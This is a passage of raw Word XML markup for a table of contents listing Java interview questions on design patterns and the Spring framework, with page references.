        <w:p w14:paraId="02775104" w14:textId="6C200AE6" w:rsidR="00012799" w:rsidRDefault="00012799">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307894" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Design Patterns</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307894 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>543</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="366BA6F9" w14:textId="07E990D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9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Design pattern? Explain all design pattern??</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307895 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>543</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AF171DA" w14:textId="1B83DFD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9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singleton design pattern? Explain it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307896 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>544</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BA9AF67" w14:textId="62C4645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9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Factory design pattern?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307897 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>545</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37BB023F" w14:textId="78C0EB9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9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Observer design pattern?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307898 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>546</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C52003C" w14:textId="2B54F8A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89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cept for the creational design pattern, can you explain other design patterns?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307899 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>547</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10DFAD01" w14:textId="3B0EADB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0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Saga design pattern?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307900 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>548</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FFCC378" w14:textId="565E5BEC" w:rsidR="00012799" w:rsidRDefault="00012799">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307901" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307901 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>552</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EE3D711" w14:textId="028841E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0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Spring Framework? What are its advantages?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307902 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>552</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15BE866A" w14:textId="1949BC5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0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Spring MVC architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307903 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>552</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49373ED0" w14:textId="44E5CC0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0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do you handle exceptions in Spring MVC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307904 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>554</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67719524" w14:textId="1B6E0D7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0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Spring Dependency Injection (DI)? How is it implemented in Spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307905 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>555</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B736F48" w14:textId="6A679B9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0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Spring Inversion of Control (IOC)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307906 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>556</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6680D187" w14:textId="6DAE6CA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0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Spring Bean Life cycle?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307907 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>558</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76F326F8" w14:textId="6F7AC1D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0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are the spring bean scopes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307908 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>560</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="692AECC1" w14:textId="5C51F45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0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any scope of spring bean?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307909 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>561</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EC9A146" w14:textId="7E1A354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1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do you define a bean in Spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307910 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>562</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="083CC942" w14:textId="3E810C6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1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add scope in bean configuration?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307911 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>563</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F019FC0" w14:textId="17E5AD9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1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session and prototype scope?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307912 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>564</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C5A5A20" w14:textId="2370D71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1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difference between SOAP and REST? Which is more efficient?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307913 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>565</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51403B24" w14:textId="0457646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1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REST API works?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307914 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>566</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2829B2CA" w14:textId="1139E88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1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ApplicationContext and BeanFactory in spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307915 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>568</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62BCB9A3" w14:textId="18DC468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1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use of @Transactional annotation in spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307916 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>570</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D2A7C46" w14:textId="5D537EA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1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are different stereotypes annotations in spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307917 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>571</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61EE965E" w14:textId="5D78136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1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front controller?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307918 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>573</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
